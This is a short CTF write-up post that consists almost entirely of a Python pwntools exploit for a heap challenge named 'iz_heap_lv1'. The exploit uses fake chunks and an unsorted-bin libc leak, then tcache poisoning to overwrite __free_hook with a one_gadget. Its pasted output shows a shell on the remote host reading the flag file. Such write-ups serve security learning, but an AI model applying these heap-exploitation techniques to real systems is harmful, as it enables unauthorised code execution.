Tags: pwn heap
Rating:
Here is my exploit @javierprtd
from pwn import *
def init(s):
io.recvuntil("Input name: ")
io.sendline(s)
def menu(n):
io.recvuntil("Choice: \n")
io.sendline(str(n))
def alloc(n, s):
menu(1)
io.recvuntil("Enter size: ")
io.sendline(str(n))
io.recvuntil("Enter data: ")
io.sendline(s)
io.recvuntil("Success!\n")
def edit(i, n, s):
menu(2)
io.recvuntil("Enter index: ")
io.sendline(str(i))
io.recvuntil("Enter size: ")
io.sendline(str(n))
io.recvuntil("Enter data: ")
io.sendline(s)
io.recvuntil("Success!\n")
def remove(i):
menu(3)
io.recvuntil("Enter index: ")
io.sendline(str(i))
def show(new_name=None):
menu(4)
io.recvuntil("DO you want to edit: (Y/N)")
if new_name is None:
io.sendline("N")
else:
io.sendline("Y")
io.recvuntil("Input name: ")
io.sendline(new_name)
io.recvuntil("Name: ")
return io.recv(0x28)[0x20:0x26]
elf = ELF("./iz_heap_lv1")
libc = ELF("./libc.so.6")
env = {"LD_PRELOAD":libc.path}
local = False
io = process(elf.path, env=env) if local else remote("165.22.110.249", 3333)
init(p64(0x602120) + p64(0)*2 + p64(0x91) + p64(0)*17 + p64(0x21) + p64(0)*3 + p64(0x21)) # fake chunks
for i in range(7):
alloc(0x80, "")
for i in range(7):
remove(i)
remove(20) # free fake chunk and go to unsorted bin
leak = u64(show("A"*0x1f).ljust(8, '\0'))
base_libc = leak - 0x3ebca0
one_gadget = base_libc + 0x4f322
free_hook = base_libc + libc.symbols['__free_hook']
print "[+] base libc: 0x%x" % base_libc
print "[+] one_gadget: 0x%x" % one_gadget
print "[+] free_hook: 0x%x" % free_hook
show(p64(0x602120) + p64(0)*2 + p64(0x31))
remove(20)
alloc(0x20, "")
alloc(0x20, "")
remove(0)
show(p64(0)*3 + p64(0x31) + p64(free_hook))
alloc(0x20, p64(free_hook))
alloc(0x20, p64(one_gadget))
remove(1)
io.interactive()
'''
[+] base libc: 0x7f03a20c4000
[+] one_gadget: 0x7f03a2113322
[+] free_hook: 0x7f03a24b18e8
[*] Switching to interactive mode
$ id
uid=1000(iz_heap_lv1) gid=1000(iz_heap_lv1) groups=1000(iz_heap_lv1)
$ cat /home/iz_heap_lv1/flag
ISITDTU{d800dab9684113a5d6c7d2c0381b48c1553068bc}
'''
